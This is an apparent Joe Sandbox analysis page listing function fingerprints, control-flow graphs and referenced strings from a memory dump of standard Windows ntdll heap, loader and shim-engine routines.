                                                                                                                                                                                • Opcode ID: ffeac7d15699fcf73e187b7e9abb2c830825932d2c65f140094f420c4b4d3d82
                                                                                                                                                                                • Instruction ID: d076e49c8dfdf6b2f4653b647ac3ee14d78a5677f14660f2874afceecf9408e4
                                                                                                                                                                                • Opcode Fuzzy Hash: ffeac7d15699fcf73e187b7e9abb2c830825932d2c65f140094f420c4b4d3d82
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C90022531200842D502665845146060009C7D1347F91C817E1414D15DC635895BB132
                                                                                                                                                                                Function 33372DA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8b5dbf10c5719dd0ea1e6280549c43273cd5112eef375790455d8ceb21a8377e
                                                                                                                                                                                • Instruction ID: fe61407b8a5426f6c6fc0b23681350cf258dae0d044cd7894654189309b2b502
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b5dbf10c5719dd0ea1e6280549c43273cd5112eef375790455d8ceb21a8377e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1890022561200942D50176584504616000A87D0243F91C827A1014D15ECA35899AB131
                                                                                                                                                                                Function 33372B20 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                • Instruction ID: 8a475219ec332924acf6f8ae17669815ba2d7517c2e6d33356581d9eab484f19
                                                                                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Function 3340A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 883 3340a1f0-3340a269 call 33342330 * 2 RtlDebugPrintTimes 889 3340a41f-3340a444 call 333424d0 * 2 call 33374b50 883->889 890 3340a26f-3340a27a 883->890 892 3340a2a4 890->892 893 3340a27c-3340a289 890->893 894 3340a2a8-3340a2b4 892->894 896 3340a28b-3340a28d 893->896 897 3340a28f-3340a295 893->897 898 3340a2c1-3340a2c3 894->898 896->897 900 3340a373-3340a375 897->900 901 3340a29b-3340a2a2 897->901 902 3340a2c5-3340a2c7 898->902 903 3340a2b6-3340a2bc 898->903 904 3340a39f-3340a3a1 900->904 901->894 902->904 907 3340a2cc-3340a2d0 903->907 908 3340a2be 903->908 909 3340a2d5-3340a2fd RtlDebugPrintTimes 904->909 910 3340a3a7-3340a3b4 904->910 912 3340a3ec-3340a3ee 907->912 908->898 909->889 921 3340a303-3340a320 RtlDebugPrintTimes 909->921 913 3340a3b6-3340a3c3 910->913 914 3340a3da-3340a3e6 910->914 912->904 917 3340a3c5-3340a3c9 913->917 918 3340a3cb-3340a3d1 913->918 915 3340a3fb-3340a3fd 914->915 919 3340a3f0-3340a3f6 915->919 920 3340a3ff-3340a401 915->920 917->918 922 3340a3d7 918->922 923 3340a4eb-3340a4ed 918->923 925 3340a447-3340a44b 919->925 926 3340a3f8 919->926 924 3340a403-3340a409 920->924 921->889 931 3340a326-3340a34c RtlDebugPrintTimes 921->931 922->914 923->924 928 3340a450-3340a474 RtlDebugPrintTimes 924->928 929 3340a40b-3340a41d RtlDebugPrintTimes 924->929 927 3340a51f-3340a521 925->927 926->915 928->889 934 3340a476-3340a493 RtlDebugPrintTimes 928->934 929->889 931->889 936 3340a352-3340a354 931->936 934->889 943 3340a495-3340a4c4 RtlDebugPrintTimes 934->943 937 3340a356-3340a363 936->937 938 3340a377-3340a38a 936->938 940 3340a365-3340a369 937->940 941 3340a36b-3340a371 937->941 942 3340a397-3340a399 938->942 940->941 941->900 941->938 944 3340a39b-3340a39d 942->944 945 3340a38c-3340a392 942->945 943->889 949 3340a4ca-3340a4cc 943->949 944->904 946 3340a394 945->946 947 3340a3e8-3340a3ea 945->947 946->942 947->912 950 3340a4f2-3340a505 949->950 951 3340a4ce-3340a4db 949->951 952 3340a512-3340a514 950->952 953 3340a4e3-3340a4e9 951->953 954 3340a4dd-3340a4e1 951->954 955 3340a516 952->955 956 3340a507-3340a50d 952->956 953->923 953->950 954->953 955->920 957 3340a51b-3340a51d 956->957 958 3340a50f 956->958 957->927 958->952
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: HEAP:
                                                                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                                                                • Opcode ID: 89bd6301f89cdc74bea36739f0e432ec1871555608818dd1a660837beffa210e
                                                                                                                                                                                • Instruction ID: b2c2a6c1bccbddb255877cd11f3e2c7a81da225e0f440bc403b31774c1e4de89
                                                                                                                                                                                • Opcode Fuzzy Hash: 89bd6301f89cdc74bea36739f0e432ec1871555608818dd1a660837beffa210e
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FA15575B143128BD704CF28C894A2AB7E5FB88750F08457DE985EB351EB70EC4ACB95
                                                                                                                                                                                Function 33367550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 959 33367550-33367571 960 33367573-3336758f call 3333e580 959->960 961 333675ab-333675b9 call 33374b50 959->961 966 33367595-333675a2 960->966 967 333a4443 960->967 968 333675a4 966->968 969 333675ba-333675c9 call 33367738 966->969 970 333a444a-333a4450 967->970 968->961 975 33367621-3336762a 969->975 976 333675cb-333675e1 call 333676ed 969->976 972 333675e7-333675f0 call 33367648 970->972 973 333a4456-333a44c3 call 333bef10 call 33378f40 RtlDebugPrintTimes BaseQueryModuleData 970->973 972->975 984 333675f2 972->984 973->972 991 333a44c9-333a44d1 973->991 982 333675f8-33367601 975->982 976->970 976->972 986 33367603-33367612 call 3336763b 982->986 987 3336762c-3336762e 982->987 984->982 988 33367614-33367616 986->988 987->988 993 33367630-33367639 988->993 994 33367618-3336761a 988->994 991->972 995 333a44d7-333a44de 991->995 993->994 994->968 996 3336761c 994->996 995->972 997 333a44e4-333a44ef 995->997 998 333a45c9-333a45db call 33372b70 996->998 1000 333a45c4 call 33374c68 997->1000 1001 333a44f5-333a452e call 333bef10 call 3337a9c0 997->1001 998->968 1000->998 1008 333a4530-333a4541 call 333bef10 1001->1008 1009 333a4546-333a4576 call 333bef10 1001->1009 1008->975 1009->972 1014 333a457c-333a458a call 3337a690 1009->1014 1017 333a458c-333a458e 1014->1017 1018 333a4591-333a45ae call 333bef10 call 333acc1e 1014->1018 1017->1018 1018->972 1023 333a45b4-333a45bd 1018->1023 1023->1014 1024 333a45bf 1023->1024 1024->972
                                                                                                                                                                                Strings
                                                                                                                                                                                • Execute=1, xrefs: 333A451E
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 333A454D
                                                                                                                                                                                • ExecuteOptions, xrefs: 333A44AB
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 333A4530
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 333A4592
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 333A4460
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 333A4507
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: 81d7d3e01ceffc674614f5bdb5c004b2aa17e7ebccb5628c9d5f34844f3190ae
                                                                                                                                                                                • Instruction ID: e902d8ac50a6f1334c0c9d89da9b6be45519b24b7383f6432467f63713eee9b3
                                                                                                                                                                                • Opcode Fuzzy Hash: 81d7d3e01ceffc674614f5bdb5c004b2aa17e7ebccb5628c9d5f34844f3190ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 93513975E00309AEEF109E98ECD5FA973ACEF04344F8485E9E505A7585DA709A41CF54
                                                                                                                                                                                Function 3334A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 333977E2
                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33397807
                                                                                                                                                                                • SsHd, xrefs: 3334A304
                                                                                                                                                                                • Actx , xrefs: 33397819, 33397880
                                                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 333978F3
                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 333977DD, 33397802
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                                                                • Opcode ID: 44715b6e1473dd8371bacf35083e6627f1c33546c3fda81b79cef9b2ea3b5413
                                                                                                                                                                                • Instruction ID: 768c760f9b8ab240c25cc6cc775782add93f80fd180d3ad6f312789e33948f35
                                                                                                                                                                                • Opcode Fuzzy Hash: 44715b6e1473dd8371bacf35083e6627f1c33546c3fda81b79cef9b2ea3b5413
                                                                                                                                                                                • Instruction Fuzzy Hash: 50E1C174A083018FE714CF64C88675A77E9BB84364F588A6DF9A5CB3D0E731D885CB92
                                                                                                                                                                                Function 3334D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33399372
                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33399153
                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33399178
                                                                                                                                                                                • GsHd, xrefs: 3334D794
                                                                                                                                                                                • Actx , xrefs: 33399315
                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 3339914E, 33399173
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                                                • Opcode ID: 90613d918ccb4c056f2b8bc5b8708a6168d8c2d34bf7f332d781e2997a40d4fa
                                                                                                                                                                                • Instruction ID: 44a08c3890c38466250b5ba28e55ba83c4a81f16e48a222348048371c3079b71
                                                                                                                                                                                • Opcode Fuzzy Hash: 90613d918ccb4c056f2b8bc5b8708a6168d8c2d34bf7f332d781e2997a40d4fa
                                                                                                                                                                                • Instruction Fuzzy Hash: DEE1A274A44342DFE710CF14C8C0B6AB7E8BF88354F498A6DE995DB292D771E844CB92
                                                                                                                                                                                Function 3332640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3332651C
                                                                                                                                                                                  • Part of subcall function 33326565: RtlDebugPrintTimes.NTDLL ref: 33326614
                                                                                                                                                                                  • Part of subcall function 33326565: RtlDebugPrintTimes.NTDLL ref: 3332665F
                                                                                                                                                                                Strings
                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33389790
                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3338977C
                                                                                                                                                                                • apphelp.dll, xrefs: 33326446
                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 333897B9
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 333897A0, 333897C9
                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 33389783, 33389796, 333897BF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                                                • Opcode ID: 715ed3d05637da935225d2956088f1ba713629a31b833434dd04073aee8bd38e
                                                                                                                                                                                • Instruction ID: 962b8ccdf45d6c2bb545bd15bb61f1c284f1503553baa4ce7d8b50bcbb8eb202
                                                                                                                                                                                • Opcode Fuzzy Hash: 715ed3d05637da935225d2956088f1ba713629a31b833434dd04073aee8bd38e
                                                                                                                                                                                • Instruction Fuzzy Hash: 9851AF71A493009FE314DF24CC90F5BBBE8EF84A44F50C919F995EB561EA70D909CB92
                                                                                                                                                                                Function 333AFA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                                                • Opcode ID: c2e7d21e563a1e16aeeea4a802deed2ee109089d5fd498152c9f6b1f9ed9c74f
                                                                                                                                                                                • Instruction ID: 25f29739707209446cc267ee3d2d4dcfe47f183333047e8f99dbcdad3846114e
                                                                                                                                                                                • Opcode Fuzzy Hash: c2e7d21e563a1e16aeeea4a802deed2ee109089d5fd498152c9f6b1f9ed9c74f
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F4158B9E01209ABDB01DF99CC80ADEBBF9EF48B54F148229E805B7240D7719A11CF90
                                                                                                                                                                                Function 33339046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $$@$@wBv
                                                                                                                                                                                • API String ID: 3446177414-2843144836
                                                                                                                                                                                • Opcode ID: 08bb1741221c09e9054208160a861200ae7c42910a8084dbb773cf48cf1584ff
                                                                                                                                                                                • Instruction ID: 45a3afe855a218b0254144a7f1ef22fdbca5d99b9d093af7fc5728c7f5aaad54
                                                                                                                                                                                • Opcode Fuzzy Hash: 08bb1741221c09e9054208160a861200ae7c42910a8084dbb773cf48cf1584ff
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A812A72D41269DBEB61CF54CC41BDEB7B8AB08710F0081DAA919F7240D7749E85CFA0
                                                                                                                                                                                Function 333DF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                • API String ID: 3446177414-3492000579
                                                                                                                                                                                • Opcode ID: 5b3a01e7bced529e829e7d88f731352ca3a9af2c4782340907565797b282a59c
                                                                                                                                                                                • Instruction ID: db805708d7e5bfefcef3733f1bc7cd8a8a3a69134b051e46a483b7169016b1b1
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b3a01e7bced529e829e7d88f731352ca3a9af2c4782340907565797b282a59c
                                                                                                                                                                                • Instruction Fuzzy Hash: CD71BA76D01744AFCB01DFA8D8A06A9FBF2FF49710F48C25AE485AB651CB359A81CF50
                                                                                                                                                                                Function 33326565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33389885
                                                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33389843
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33389854, 33389895
                                                                                                                                                                                • LdrpLoadShimEngine, xrefs: 3338984A, 3338988B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                                                • Opcode ID: 923e8defedaa97d79e1eb86bfdefe57e300fecabed0d581c949ab084d383e18e
                                                                                                                                                                                • Instruction ID: 74731998d9603ec34608cae1763945c6507215d0723bc6f3e360f43a5587e475
                                                                                                                                                                                • Opcode Fuzzy Hash: 923e8defedaa97d79e1eb86bfdefe57e300fecabed0d581c949ab084d383e18e
                                                                                                                                                                                • Instruction Fuzzy Hash: EA51FF32E413489FDB04EFA8CC94A9DBBE6AF50704F048569E450FF296DAA49C46CB80
                                                                                                                                                                                Function 3335DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                • API String ID: 3446177414-3224558752
                                                                                                                                                                                • Opcode ID: 0c0e91a0665d8fd1b2f4da7d2a327a1735167d890bce645a9899341975df38ba
                                                                                                                                                                                • Instruction ID: 401d80346cd1dde7ebb9278799aeac4fd196c92641423427c52f96d0bfbd52b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c0e91a0665d8fd1b2f4da7d2a327a1735167d890bce645a9899341975df38ba
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A412775A54740DFF701DF28C884BAAB7A8EF40751F08C669F456A7681CB78D9C0CB91
                                                                                                                                                                                Function 3335DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                                                • Opcode ID: 0dfb4bf0b85f64b07af28417461a033b5cb26fc465c7c4ae0e02c85d785020af
                                                                                                                                                                                • Instruction ID: 9b0b3f7501e205e35ee498b0322ed140669e258a6ecb5f44792d56258634c36d
                                                                                                                                                                                • Opcode Fuzzy Hash: 0dfb4bf0b85f64b07af28417461a033b5cb26fc465c7c4ae0e02c85d785020af
                                                                                                                                                                                • Instruction Fuzzy Hash: 82314435901B84EFF712DF24C848F9937E8EF01A50F08C684F452A7AA1CBB9D980CB51
                                                                                                                                                                                Function 33367A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81timethreadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                • String ID: ^Qc
                                                                                                                                                                                • API String ID: 4281723722-3751124073
                                                                                                                                                                                • Opcode ID: a5f221b3a47ade4444efe218b65e602e41805c31721a5cdf68adfef1846943e3
